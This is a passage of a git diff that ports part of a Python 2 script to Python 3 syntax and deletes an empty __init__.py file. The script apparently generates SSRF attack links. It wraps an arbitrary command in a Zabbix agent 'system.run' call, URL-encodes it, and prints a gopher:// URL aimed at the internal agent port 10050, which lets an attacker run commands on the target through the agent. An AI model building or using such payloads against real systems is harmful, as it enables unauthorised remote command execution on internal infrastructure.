 payload = "system.run[(" + command + ");sleep 2s]"
- finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
+ finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
- print "\033[93m" +"\nYour gopher link is ready to do SSRF: \n"+ "\033[0m"
- print "\033[04m" +"gopher://127.0.0.1:10050/_" + finalpayload+ "\033[0m"
- print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m"
+ print("\033[93m" +"\nYour gopher link is ready to do SSRF: \n"+ "\033[0m")
+ print("\033[04m" +"gopher://127.0.0.1:10050/_" + finalpayload+ "\033[0m")
+ print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m")
diff --git a/scripts/__init__.py b/scripts/__init__.py
deleted file mode 100644
index 8b13789..0000000
--- a/scripts/__init__.py
+++ /dev/null
@@ -1 +0,0 @@
-